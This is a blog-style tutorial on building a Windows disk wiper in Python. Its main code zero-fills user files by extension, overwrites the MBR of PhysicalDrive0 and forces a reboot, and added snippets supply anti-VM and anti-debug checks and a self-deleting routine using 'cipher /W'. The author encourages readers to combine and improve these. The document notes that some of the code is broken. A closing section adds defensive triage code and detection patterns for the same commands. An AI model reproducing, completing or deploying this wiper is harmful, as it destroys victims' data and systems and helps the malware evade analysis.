A wiper is a class of malware intended to erase (wipe, hence the name) the hard drive of the computer it infects, maliciously deleting data and programs.
Simply put, a wiper just straight up destroys EVERYTHING it can reach on a system, with no intent of ever giving it back (that's what separates it from ransomware), thus "disabling" the system. I found this awesome article by @0xf00I that I'll be using as my main reference for this. The wiper described there works in four primary stages:
Destroy file contents
Destroy the MBR
Remove itself
Shut the system down!
Let's look at a simple Python wiper. Assuming that you've got a rootkit to pack this sucker with, here's a simple program that tries to wipe a Windows system:
```python
import os
import sys
import subprocess
import ctypes
from ctypes import wintypes
import win32api

startupinfo = subprocess.STARTUPINFO()  # type: ignore
drives = win32api.GetLogicalDriveStrings()
kernel32 = ctypes.WinDLL('kernel32')


def OverWriteMBR():
    # Create a handle to our Physical Drive
    # (GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, OPEN_EXISTING)
    hDevice = kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000,
                                   0x00000001 | 0x00000002, None, 3, 0, 0)
    # Overwrite the MBR! (Never run this on your main machine!)
    # NOTE: the buffer `Data` is never defined anywhere on the page, so as
    # written this line raises NameError before anything is written.
    kernel32.WriteFile(hDevice, Data, None)
    kernel32.CloseHandle(hDevice)  # Close the handle to our Physical Drive!


def SetFiles():
    # files to seek out and overwrite
    ext = [".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg", ".rm", ".swf",
           ".vob", ".wmv", ".docx", ".pdf", ".rar", ".jpg", ".jpeg", ".png",
           ".tiff", ".zip", ".7z", ".tar.gz", ".tar", ".mp3", ".sh", ".c",
           ".cpp", ".h", ".gif", ".txt", ".jar", ".sql", ".bundle", ".sqlite3",
           ".html", ".php", ".log", ".bak", ".deb"]
    # NOTE: os.getcwd() already returns an absolute path, so this glues two
    # absolute paths together and the walk finds nothing unless you fix it.
    for dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"):
        for f in files:
            path = os.path.abspath(os.path.join(dirpath, f))
            if f.endswith(tuple(ext)):
                with open(path, "rb") as fh:
                    data = fh.read()
                # Opening with "wb" truncates the file; a single zero byte
                # (hex 00) is then written in place of the content.
                with open(path, "wb") as fh:
                    fh.write(b'\x00')


def SysDown():
    # InitiateSystemShutdown()
    # -r reboots; use -s if you actually want the box to stay off
    os.system("shutdown -t 0 -r -f ")


def main():
    global application_path
    if getattr(sys, 'frozen', False):
        application_path = sys.executable
    else:
        application_path = os.path.dirname(os.path.abspath(__file__))
    SetFiles()
    OverWriteMBR()


if __name__ == "__main__":
    main()
    SysDown()
```
Simple as that! Run this as admin and it goes after the targeted extensions under the walked directory and then the first sector of PhysicalDrive0. Neat, right? Well, as written it's not very effective: the walked path is broken, the MBR write buffer is never defined, zero-filling a file does nothing about Volume Shadow Copies or backups, and on a UEFI/GPT disk sector 0 only holds the protective MBR, so the GPT header and partition entries in the following sectors (and the backup GPT at the end of the disk) survive untouched. But you can add a whole bunch of stuff to make it even better! (I'll once again be yoinking some code from the exalted @0xf00I's skywiper repo...)
For example, you can add a check that the program is running with elevated privileges (raw writes to PhysicalDrive0 fail without them), plus some anti-VM and anti-debug checks and a self-delete routine:
```python
import os
import ctypes
from ctypes import windll
import psutil


def IsAdmin():
    """Checks if it has Administrator privileges; if it doesn't, it runs itself
    using the ShellExecute trick and exits immediately; if it does, it performs
    the task at hand. (Only the check itself is shown here.)"""
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except Exception:
        return False


def AntiVm():
    # process names that give away VMware / VirtualBox / Sandboxie guests
    Process = ["vmsrvc.exe", "vmusrvc.exe", "vboxtray.exe", "vmtoolsd.exe",
               "df5serv.exe", "vboxservice.exe"]
    for process in psutil.process_iter():
        for i in Process:
            if i in process.name().lower():
                return CommitSuicide()


def AntiDebug():
    isDebuggerPresent = windll.kernel32.IsDebuggerPresent()
    if isDebuggerPresent:
        return CommitSuicide()


def CommitSuicide():
    # At the end of the script, the file is deleted & over-written:
    # cipher /W overwrites the free space on the volume, which is where the
    # deleted file's clusters now live
    file_path = os.path.abspath(__file__)
    os.remove(file_path)
    folder_path = os.path.dirname(file_path)
    os.system("cipher /W:%s" % folder_path)
```
You can include calls to all this stuff in the main() function and you'll have an even better wiper! Alas, good wipers are far too complicated, and it's best if I leave it here. I'll try to make one such and put it up here in the future (no guarantees though!). Please feel free to reach out and ask about this stuff if you need to~
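Flipping this around for the blue team: here is an added triage example (my code, not from this post and not from the skywiper repo) that looks for the artefacts the wiper above leaves behind. It walks a directory for targeted files that are now empty or consist only of 0x00 bytes, checks whether a first sector still carries the 0x55AA boot signature that a real MBR or GPT protective MBR ends with, and flags the `cipher /W:` and `shutdown -t 0` command lines from CommitSuicide() and SysDown() in process-creation log lines. The directory tree, the 512-byte sectors and the 4688-style log lines are all constructed inline for the demo; the function names are mine.

```python
import os
import re
import shutil
import tempfile
from pathlib import Path

# Added triage helpers for this page; not part of the wiper above or of skywiper.


def file_looks_zeroed(path: Path, max_probe: int = 65536) -> bool:
    """True if the file is empty or its first max_probe bytes are all 0x00.
    Both shapes are what the SetFiles() loop above leaves behind."""
    try:
        size = path.stat().st_size
    except OSError:
        return False
    if size == 0:
        return True
    with path.open("rb") as fh:
        chunk = fh.read(max_probe)
    return chunk.count(0) == len(chunk)


def find_zeroed_files(root: Path, exts: tuple) -> list:
    """Walk root and return every file with a targeted extension that has been zeroed."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if name.lower().endswith(exts) and file_looks_zeroed(p):
                hits.append(p)
    return sorted(hits)


def mbr_looks_wiped(sector0: bytes) -> bool:
    """A valid MBR (or GPT protective MBR) ends with 0x55AA at offset 510.
    A short or signature-less sector 0 means it was overwritten. Caveat: an
    unpartitioned disk also has no signature, so compare with a known-good image."""
    if len(sector0) < 512:
        return True
    return sector0[510:512] != b"\x55\xaa"


WIPER_CMDLINE_PATTERNS = [
    re.compile(r"\bcipher(\.exe)?\s+/w:", re.I),        # free-space overwrite from CommitSuicide()
    re.compile(r"\bshutdown(\.exe)?\s.*-t\s*0", re.I),  # immediate shutdown/reboot from SysDown()
]


def flag_wiper_commandlines(log_lines) -> list:
    """Return (line_number, pattern) for each process-creation line matching an indicator."""
    flagged = []
    for n, line in enumerate(log_lines, 1):
        for pat in WIPER_CMDLINE_PATTERNS:
            if pat.search(line):
                flagged.append((n, pat.pattern))
                break
    return flagged


# Constructed 4688-style lines for the demo; not taken from a real host.
SAMPLE_PROCESS_LOG = [
    'New Process Name: C:\\Windows\\System32\\cmd.exe  Command Line: cmd /c "dir C:\\Users"',
    'New Process Name: C:\\Windows\\System32\\cipher.exe  Command Line: cipher /W:C:\\Users\\bob\\Downloads',
    'New Process Name: C:\\Windows\\System32\\shutdown.exe  Command Line: shutdown -t 0 -r -f',
    'New Process Name: C:\\Windows\\System32\\notepad.exe  Command Line: notepad.exe notes.txt',
]


def demo() -> dict:
    """Build a constructed directory tree with wiper-style artefacts and run all three checks."""
    tmp = Path(tempfile.mkdtemp(prefix="wiper_triage_"))
    try:
        (tmp / "report.docx").write_bytes(b"PK\x03\x04 real content")  # intact file
        (tmp / "notes.txt").write_bytes(b"\x00")                         # single zero byte, as SetFiles() leaves
        (tmp / "sub").mkdir()
        (tmp / "sub" / "photo.jpg").write_bytes(b"")                     # truncated to zero length
        (tmp / "sub" / "zeros.pdf").write_bytes(b"\x00" * 4096)          # fully zero-filled
        (tmp / "keep.exe").write_bytes(b"\x00" * 10)                     # not a targeted extension
        zeroed = find_zeroed_files(tmp, (".docx", ".txt", ".jpg", ".pdf"))
        good_mbr = b"\xfa\x33\xc0" + b"\x90" * 507 + b"\x55\xaa"         # constructed sector with signature
        wiped_mbr = b"\x00" * 512                                         # constructed zeroed sector
        return {
            "zeroed_files": [p.name for p in zeroed],
            "good_mbr_wiped": mbr_looks_wiped(good_mbr),
            "wiped_mbr_wiped": mbr_looks_wiped(wiped_mbr),
            "flagged_lines": [n for n, _ in flag_wiper_commandlines(SAMPLE_PROCESS_LOG)],
        }
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

On a real case you would point find_zeroed_files() at a mounted image or the user profile, feed mbr_looks_wiped() the first 512 bytes read from the disk image, and run flag_wiper_commandlines() over exported 4688 or Sysmon process-creation events; the zero-byte check is deliberately cheap so it can run across a whole volume.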